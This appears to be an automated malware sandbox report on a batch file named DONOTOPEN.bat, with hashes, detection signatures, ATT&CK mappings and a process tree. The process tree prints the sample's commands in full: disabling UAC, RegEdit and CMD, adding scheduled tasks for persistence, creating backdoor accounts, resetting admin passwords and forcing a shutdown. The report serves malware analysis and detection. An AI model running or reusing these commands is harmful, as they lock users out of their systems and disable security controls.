Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
55s -
max time network
57s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
30/04/2024, 13:57
Static task
static1
Errors
General
-
Target
DONOTOPEN.bat
-
Size
9KB
-
MD5
4d53c3d83c92387b73339017093a82d0
-
SHA1
e38992e8b91986cf21052a1cfecedba8a3b6fea6
-
SHA256
6e5d2734a8ed929fbd2862aff022a597b8418dfef0207df1a772f8372790ae76
-
SHA512
7122c7d7b2551ef847e94537971ef159570fe812bae9e8f0defb31afd997cc861919f0a1ad476079ad01b95b3aecb6b506bb6ecc83e95d5c3758903fe6706644
-
SSDEEP
192:UlM+642KhNglPgYCbYBYRCNn9DU2U+ma+RGDzuQj:UlMH4Rh06oU2U+b+sSQj
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\a cmd.exe File opened for modification C:\Windows\a cmd.exe File created C:\Windows\start.bat certutil.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5052 schtasks.exe 672 schtasks.exe 3872 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 1492 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "143" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe -
Modifies registry key 1 TTPs 6 IoCs
pid Process 1076 reg.exe 3068 reg.exe 1888 reg.exe 4552 reg.exe 1964 reg.exe 3156 reg.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1492 taskkill.exe Token: SeShutdownPrivilege 3808 shutdown.exe Token: SeRemoteShutdownPrivilege 3808 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3620 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2224 wrote to memory of 2128 2224 cmd.exe 80 PID 2224 wrote to memory of 2128 2224 cmd.exe 80 PID 2224 wrote to memory of 4656 2224 cmd.exe 81 PID 2224 wrote to memory of 4656 2224 cmd.exe 81 PID 4656 wrote to memory of 1492 4656 cmd.exe 83 PID 4656 wrote to memory of 1492 4656 cmd.exe 83 PID 4656 wrote to memory of 3288 4656 cmd.exe 86 PID 4656 wrote to memory of 3288 4656 cmd.exe 86 PID 3288 wrote to memory of 3068 3288 cmd.exe 87 PID 3288 wrote to memory of 3068 3288 cmd.exe 87 PID 4656 wrote to memory of 1612 4656 cmd.exe 88 PID 4656 wrote to memory of 1612 4656 cmd.exe 88 PID 1612 wrote to memory of 1888 1612 cmd.exe 89 PID 1612 wrote to memory of 1888 1612 cmd.exe 89 PID 4656 wrote to memory of 4264 4656 cmd.exe 90 PID 4656 wrote to memory of 4264 4656 cmd.exe 90 PID 4264 wrote to memory of 4552 4264 cmd.exe 91 PID 4264 wrote to memory of 4552 4264 cmd.exe 91 PID 4656 wrote to memory of 4496 4656 cmd.exe 92 PID 4656 wrote to memory of 4496 4656 cmd.exe 92 PID 4496 wrote to memory of 1964 4496 cmd.exe 93 PID 4496 wrote to memory of 1964 4496 cmd.exe 93 PID 4656 wrote to memory of 4860 4656 cmd.exe 94 PID 4656 wrote to memory of 4860 4656 cmd.exe 94 PID 4860 wrote to memory of 3156 4860 cmd.exe 95 PID 4860 wrote to memory of 3156 4860 cmd.exe 95 PID 4656 wrote to memory of 2396 4656 cmd.exe 96 PID 4656 wrote to memory of 2396 4656 cmd.exe 96 PID 2396 wrote to memory of 1076 2396 cmd.exe 97 PID 2396 wrote to memory of 1076 2396 cmd.exe 97 PID 4656 wrote to memory of 5052 4656 cmd.exe 98 PID 4656 wrote to memory of 5052 4656 cmd.exe 98 PID 4656 wrote to memory of 672 4656 cmd.exe 99 PID 4656 wrote to memory of 672 4656 cmd.exe 99 PID 4656 wrote to memory of 3872 4656 cmd.exe 100 PID 4656 wrote to memory of 3872 4656 cmd.exe 100 PID 4656 wrote to memory of 2800 4656 cmd.exe 101 PID 4656 wrote to memory of 2800 4656 cmd.exe 101 PID 2800 wrote to memory of 3548 2800 net.exe 102 PID 2800 wrote to memory of 3548 2800 net.exe 102 PID 4656 wrote to memory of 1064 4656 cmd.exe 103 PID 4656 wrote to memory of 1064 4656 cmd.exe 103 PID 1064 wrote to memory of 4876 1064 net.exe 104 PID 1064 wrote to memory of 4876 1064 net.exe 104 PID 4656 wrote to memory of 340 4656 cmd.exe 105 PID 4656 wrote to memory of 340 4656 cmd.exe 105 PID 340 wrote to memory of 2888 340 net.exe 106 PID 340 wrote to memory of 2888 340 net.exe 106 PID 4656 wrote to memory of 2676 4656 cmd.exe 107 PID 4656 wrote to memory of 2676 4656 cmd.exe 107 PID 2676 wrote to memory of 2104 2676 net.exe 108 PID 2676 wrote to memory of 2104 2676 net.exe 108 PID 4656 wrote to memory of 3112 4656 cmd.exe 109 PID 4656 wrote to memory of 3112 4656 cmd.exe 109 PID 3112 wrote to memory of 4524 3112 net.exe 110 PID 3112 wrote to memory of 4524 3112 net.exe 110 PID 4656 wrote to memory of 2284 4656 cmd.exe 111 PID 4656 wrote to memory of 2284 4656 cmd.exe 111 PID 2284 wrote to memory of 1560 2284 net.exe 112 PID 2284 wrote to memory of 1560 2284 net.exe 112 PID 4656 wrote to memory of 3852 4656 cmd.exe 113 PID 4656 wrote to memory of 3852 4656 cmd.exe 113 PID 3852 wrote to memory of 1288 3852 net.exe 114 PID 3852 wrote to memory of 1288 3852 net.exe 114 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DONOTOPEN.bat"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\certutil.execertutil -decode a start.bat2⤵
- Drops file in Windows directory
PID:2128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\system32\taskkill.exeTASKKILL /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f4⤵
- Modifies registry key
PID:3068
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
PID:1888
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:4552
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:1964
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f3⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f4⤵
- Modifies registry key
PID:3156
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f3⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f4⤵
- Modifies registry key
PID:1076
-
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN virusalert /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat /IT3⤵
- Creates scheduled task(s)
PID:5052
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN firewallaelrt /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs /IT3⤵
- Creates scheduled task(s)
PID:672
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Create /SC MINUTE /MO 1 /TN DefenderTotalFuck /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat /IT3⤵
- Creates scheduled task(s)
PID:3872
-
-
C:\Windows\system32\net.exeNET USER HACKER001 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER001 Trash0001 /add4⤵PID:3548
-
-
-
C:\Windows\system32\net.exeNET USER HACKER002 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER002 Trash0001 /add4⤵PID:4876
-
-
-
C:\Windows\system32\net.exeNET USER HACKER003 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER003 Trash0001 /add4⤵PID:2888
-
-
-
C:\Windows\system32\net.exeNET USER HACKER004 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER004 Trash0001 /add4⤵PID:2104
-
-
-
C:\Windows\system32\net.exeNET USER HACKER005 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER005 Trash0001 /add4⤵PID:4524
-
-
-
C:\Windows\system32\net.exeNET USER HACKER006 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER006 Trash0001 /add4⤵PID:1560
-
-
-
C:\Windows\system32\net.exeNET USER HACKER007 Trash0001 /add3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER007 Trash0001 /add4⤵PID:1288
-
-
-
C:\Windows\system32\net.exeNET USER HACKER008 Trash0001 /add3⤵PID:3744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER008 Trash0001 /add4⤵PID:492
-
-
-
C:\Windows\system32\net.exeNET USER HACKER009 Trash0001 /add3⤵PID:5040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER009 Trash0001 /add4⤵PID:4040
-
-
-
C:\Windows\system32\net.exeNET USER HACKER010 Trash0001 /add3⤵PID:5024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER010 Trash0001 /add4⤵PID:952
-
-
-
C:\Windows\system32\net.exeNET USER HACKER011 Trash0001 /add3⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER011 Trash0001 /add4⤵PID:1972
-
-
-
C:\Windows\system32\net.exeNET USER HACKER012 Trash0001 /add3⤵PID:1180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER012 Trash0001 /add4⤵PID:1152
-
-
-
C:\Windows\system32\net.exeNET USER HACKER013 Trash0001 /add3⤵PID:1596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER013 Trash0001 /add4⤵PID:4604
-
-
-
C:\Windows\system32\net.exeNET USER HACKER014 Trash0001 /add3⤵PID:2408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER014 Trash0001 /add4⤵PID:660
-
-
-
C:\Windows\system32\net.exeNET USER HACKER015 Trash0001 /add3⤵PID:3680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER015 Trash0001 /add4⤵PID:4620
-
-
-
C:\Windows\system32\net.exeNET USER HACKER016 Trash0001 /add3⤵PID:4248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER016 Trash0001 /add4⤵PID:240
-
-
-
C:\Windows\system32\net.exeNET USER HACKER017 Trash0001 /add3⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER017 Trash0001 /add4⤵PID:3788
-
-
-
C:\Windows\system32\net.exeNET USER HACKER018 Trash0001 /add3⤵PID:2808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER018 Trash0001 /add4⤵PID:2792
-
-
-
C:\Windows\system32\net.exeNET USER HACKER019 Trash0001 /add3⤵PID:1836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER019 Trash0001 /add4⤵PID:3536
-
-
-
C:\Windows\system32\net.exeNET USER HACKER020 Trash0001 /add3⤵PID:3712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER HACKER020 Trash0001 /add4⤵PID:4720
-
-
-
C:\Windows\system32\net.exeNET USER Administrator Trashedpc013⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER Administrator Trashedpc014⤵PID:1392
-
-
-
C:\Windows\system32\net.exeNET USER Admin Trashedpc013⤵PID:2912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 USER Admin Trashedpc014⤵PID:2884
-
-
-
C:\Windows\system32\shutdown.exeshutdown /s /t 5 /c You are an idiot! HAHAHAHAHAHAHA3⤵PID:4596
-
-
C:\Windows\system32\shutdown.exeshutdown /r /t 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat"1⤵PID:2080
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs"1⤵PID:1136
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat"1⤵PID:3900
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN virusalert2⤵PID:3280
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Run /TN firewallalert2⤵PID:4084
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39c8855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3620
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
435B
MD5ab1b7b617bc14004ba2291b28ba1a13c
SHA176bc336ea75743db95742df682a7f1bd5d495a9b
SHA2569d1f99df292cc3c17df264810458358c4b303236150a7447c6c5a299067e5530
SHA5121d42fa77bbe1f83c216c37cde9acada960110078bf9705997c056c5ca975e15e20488ca6a13232a8ebe885cbabeeac21887932568bbb038e204dd9e190cbe74c
-
Filesize
896B
MD51c0a55a868aa2003dcb51e010d3b566e
SHA1f63c853e91f094af8f6c0db0a79979838845c38d
SHA256fd72a0fb87595ff91d3c78a5e7eb584ee347c35d6b1466841a675bb23158c426
SHA512ce55e13f2b3b9b4e6d641114bc7a6ee6543be65b206f0ab6fa081d2bef580232cce6b59626e62f32982b9cbb1bf6c4fc093c7891528c8bda88ebc6b112ea803a
-
Filesize
65B
MD55d98878f4cec866f540d627a905b5dc9
SHA16ad61fd942be1dba4130cc51c1b5f11dad6558cb
SHA2560f7e7769567ebfac514d5ca738644fcbbb3194e963a9be65f17e62f58075360d
SHA5125146f84d2e39a43ba7592bc8f9e99ee1174f2effaee4a4b5ecffcce554760eb1f8264de13e50cc9b36ddeeeb8ba6a5d868b287548c901a3de2f998eb67ec4f16
-
Filesize
8KB
MD565888f1a707233e12b232b53ae1a7b77
SHA1be27cd99043bc7cdf220a5d396aa46e6292bc87d
SHA256e6ce11f3c97c2e62a41a1a5c01a5fc3391d39e6ef1c45c3134ce1cd182995b97
SHA5120ed36491f4386f78a4a8a8099a3fa4bc78852a467aee524a06b2a75a68d1b9f437efb9ba2eab5c7ffc4e71bdbbf93b6820ea25134f22fc76e9cf5acab053831f
-
Filesize
4KB
MD553d27ec4d1ee59de6ccce556bcee63ab
SHA1c9f1a39f1f8fa7047acde3be5dc8321e4fe238b0
SHA256c2b977bdbd6df8e045ca51961b8c5a47ffd1017a27e24c90da19fcedff818d10
SHA5127a38cc222d3806dfba0dc7deff1361e8f73f995230b69fd1054a3ee03345331a751ab9e78debfdaa4c988f9d25ae72215b51520eb8cbecb17db68bf716fe855f
-
Filesize
5KB
MD592001ff0cdf2d1734fa43ca0b7b53e86
SHA1ec6c837d9ee3bc2037ce2889748a353a6f8a1d29
SHA256ba66ffcd3ae6ce6ee7dc74c639791ab454afab6b124ce11be2131f99e37a2b6d
SHA5127f0d8ba2adb6305b0f30e1800775f107c30b691c2a2ae04420efb9f70fb237ecfb0e3e945825bef887f1ed6dfc3145b2d724e9505c01de551ae99cf98558d91e